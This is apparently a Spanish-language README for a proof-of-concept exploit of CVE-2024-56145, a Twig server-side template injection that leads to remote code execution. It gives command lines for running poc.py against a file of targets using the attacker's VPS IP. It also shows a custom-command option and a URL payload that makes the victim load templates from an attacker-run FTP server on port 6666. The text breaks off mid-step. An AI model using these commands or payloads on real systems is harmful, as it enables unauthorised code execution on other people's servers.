
CVE-2024-56145 SSTI a RCE - plantillas Twig
fuser -k 6666/tcp
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
Se puede usar un comando personalizado como python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
-i es tu IP o la IP de tu VPS (úsala ejecutando ipconfig / ifconfig).
Por ejemplo - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
¿Y ahora qué? ¿Tienes un objetivo vulnerable pero quieres jugar más? Por eso he añadido poc2.py, que sirve para pruebas manuales contra el objetivo. ¿Cómo se hace?
haz fuser -k 6666/tcp
1. Ejecuta poc2.py (se iniciará el puerto 6666 como FTP).
2. Abre el navegador en tutarget.com/?--templatesPath=ftp://IP-DEL-VPS:6666/
3. Verás -

Escrito por Chirag Artani (https://x.com/Chirag99Artani)